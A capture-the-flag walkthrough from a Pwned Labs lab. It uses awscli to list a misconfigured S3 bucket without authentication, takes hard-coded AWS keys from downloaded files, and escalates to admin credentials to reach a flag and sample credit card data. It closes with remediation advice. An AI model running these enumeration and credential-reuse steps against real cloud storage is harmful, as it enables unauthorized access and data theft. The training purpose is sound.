S3 Enumeration Basics

CTF Source: Pwned Labs

Overview

In this walkthrough, we're provided with a website link. After discovering the site is hosted on AWS S3, we'll learn how to enumerate S3 and, due to a misconfiguration, uncover additional credentials leading to the compromise of several secrets and credit card data.

Pre-Requisites

• Install awscli: (brew/apt) install awscli

Walkthrough

Finding and Accessing the S3 Bucket

We'll start by visiting the website in our browser and inspecting its source code.

We'll discover the website is retrieving content from S3.

If we attempt to navigate to the CSS file, we'll discover we can see it.

Let's try to traverse the directories of this bucket to see if we can access other files.

Let's try using the awscli like so.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request      
  
                           PRE admin/
                           PRE migration-files/
                           PRE shared/
                           PRE static/
2023-10-16 11:00:47       5347 index.html 

• --no-sign-request is needed so we’re not signing the request with any local AWS credentials

Okay, now we're noticing some files!

It doesn't appear we can list contents for anything but shared/

aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

2023-10-16 09:08:33          0 
2023-10-16 09:09:01        993 hl_migration_project.zip

Let's attempt to download this file.

aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip --no-sign-request .

download: s3://dev.huge-logistics.com/shared/hl_migration_project.zip to ./hl_migration_project.zip

Nice! Let's open it up and see what we can find.

Finding Credentials

Unzipping the file

unzip ./hl_migration_project.zip

Reading the contents

cat migrate_secrets.ps1 

# AWS Configuration
$accessKey = "AKIA3[snip]"
$secretKey = "MwGe3[snip]"
$region = "us-east-1"
[snip]

We found some creds!

Gaining Access to migration-files

We can use the command aws configure and set up the credentials we just found.

Let's try to enumerate those admin files we found previously.

aws s3 ls s3://dev.huge-logistics.com/admin/       
                     
2023-10-16 09:08:38          0 
2023-10-16 09:10:51         32 flag.txt
2023-10-16 14:24:07       2425 website_transactions_export.csv

Okay, we're getting somewhere. Can we download the data?

aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden

Nope... Let's move on to those migration-files and try that.

aws s3 ls s3://dev.huge-logistics.com/migration-files/       
           
2023-10-16 09:08:47          0 
2023-10-16 09:09:26    1833646 AWS Secrets Manager Migration - Discovery & Design.pdf
2023-10-16 09:09:25    1407180 AWS Secrets Manager Migration - Implementation.pdf
2023-10-16 09:09:27       1853 migrate_secrets.ps1
2023-10-16 12:00:13       2494 test-export.xml

aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .   
 
download: s3://dev.huge-logistics.com/migration-files/test-export.xml to ./test-export.xml

Nice! Let's read the files.

cat test-export.xml 
   
<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
[SNIP]
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>

Looks like we found several credentials for various systems! Let's test out the AWS IT Admin creds.

Gaining Access to admin

Again, we'll set up our credentials like so,

aws configure --profile it-admin

Let's try to download those admin files now.

aws --profile it-admin s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

download: s3://dev.huge-logistics.com/admin/flag.txt to ./flag.txt

cat ./flag.txt     

a49f1[snip]

Success! We found the flag! Likewise, if we download the other file, website_transactions_export.csv we'll uncover some plaintext credit card information!

cat website_transactions_export.csv 

network,credit_card_number,cvv,expiry_date,card_holder_name,validation,username,password,ip_address
Visa,4055497191304,386,5/2021,Hunter Miller,,hunter_m,password123,34.56.78.90
Visa,4055491339081,492,8/2021,Jayden Adams,,jay_adams,jayden2023,157.89.34.56
[SNIP]

Wrap-up

In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the /migration-files/ folder, where a file containing additional hard-coded credentials, including those for the AWS IT Admin user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the /admin/ directory of the S3 bucket.

Let's discuss a few issues we uncovered along the way,

1. Multi-use of an S3 bucket

   • It's clear that this bucket was used for multiple purposes (website hosting, credit card data storage, and some sort of secrets management migration)

   • Multi-use of a bucket like this can lead to unintentional consequences as we uncovered

   • Recommendation:

     • Separate buckets should be utilized for different use cases to reduce the likelihood of permission misconfiguration

2. Mishandling of credit card data

   • The credit card data found was unencrypted and not stored in an appropriate location

   • Recommendation:

     • Encrypt credit card data

     • Store this data in an appropriate location and restrict access

3. World-readable shared directory

   • This directory was accessible by anyone and contained hard-coded secrets to several solutions.

   • The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.

   • Recommendation:

     • Store this data in an appropriate location and restrict access

     • If the data needs to be shared externally, consider enabling cross-account access via an IAM Role or sharing in an alternative secure solution.